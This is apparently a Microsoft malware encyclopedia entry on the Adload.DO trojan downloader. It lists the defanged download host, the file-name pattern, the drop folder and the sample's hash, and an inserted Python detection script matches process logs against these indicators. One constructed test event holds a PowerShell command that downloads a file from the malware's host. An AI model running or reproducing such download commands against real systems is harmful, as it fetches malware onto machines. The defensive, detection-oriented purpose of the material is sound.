TrojanDownloader:Win32/Adload.DO
First posted on 20 April 2017.
Source: Microsoft
Aliases:
There are no other names known for TrojanDownloader:Win32/Adload.DO.
Explanation:
Installation
This malware downloads random files from hxxp://d2hrpnfyb3wv3k[.]cloudfront[.]net, and then runs them on the infected system.
We have observed that this malware:
- Is distributed by or with potentially unwanted applications
- Uses a file name with the *amd.exe suffix
Payload
Downloads malware or potentially unwanted applications
This threat can download other malware or potentially unwanted applications onto your PC.
It triggers a PowerShell instance to download random files from hxxp://d2hrpnfyb3wv3k[.]cloudfront[.]net.
Downloaded files are then saved into the Temporary Internet Files folder of your PC's current user. The downloaded files may be other members of the Win32/Adload family or other potentially unwanted applications.
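The traits described above can be combined into a hunting check over process-creation logs. The following is an added example, not part of the original description: it assumes Sysmon-style fields (ParentImage, Image, CommandLine), assumes the *amd.exe file is the parent of the PowerShell instance, and uses constructed sample events.

```python
import ntpath

# Indicators from the description above; the host stays defanged until match time.
HOST = "d2hrpnfyb3wv3k[.]cloudfront[.]net".replace("[.]", ".")
PARENT_SUFFIX = "amd.exe"                 # the "*amd.exe" file-name pattern
DROP_DIR = "temporary internet files"     # where downloads are saved

def assess(event):
    """Return the Adload.DO traits seen in one process-creation event."""
    if ntpath.basename(event["Image"]).lower() != "powershell.exe":
        return []                         # only PowerShell children are of interest
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd = event["CommandLine"].lower()
    traits = []
    if parent.endswith(PARENT_SUFFIX):
        traits.append("parent_name")
    if HOST in cmd:
        traits.append("download_host")
    if DROP_DIR in cmd:
        traits.append("drop_folder")
    return traits

def hunt(events):
    """Map event index -> traits for every event showing at least one trait."""
    return {i: t for i, e in enumerate(events) if (t := assess(e))}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not captured from a real infection).
EVENTS = [
    {"ParentImage": r"C:\Users\u\AppData\Local\Temp\setupamd.exe", "Image": PS,
     "CommandLine": rf"powershell Invoke-WebRequest http://{HOST}/f -OutFile "
                    r"'C:\Users\u\AppData\Local\Microsoft\Windows\Temporary Internet Files\f'"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Get-Date"},
    {"ParentImage": r"C:\Tools\updateamd.exe", "Image": PS,
     "CommandLine": "powershell Get-Date"},
    {"ParentImage": r"C:\Users\u\Downloads\xamd.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for index, traits in hunt(EVENTS).items():
        print(index, EVENTS[index]["ParentImage"], traits)
```

A parent-name match on its own (the third sample event) is a weak signal and should be treated as a lead for triage; the download host in the command line is the strongest of the three traits.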
Connects to a remote host
We have seen this threat connect to a remote host, including:
- hxxp://d2hrpnfyb3wv3k[.]cloudfront[.]net
Malware can connect to a remote host to do any of the following:
- Check for an Internet connection
- Download and run files (including updates or other malware)
- Report a new infection to its author
- Receive configuration or other data
This malware description was published based on the analysis of file SHA1 D9E57B9B526908CD3723CD6A7FC259A8BCE809CF.
Analysis by Zarestel Ferrer
Last update 20 April 2017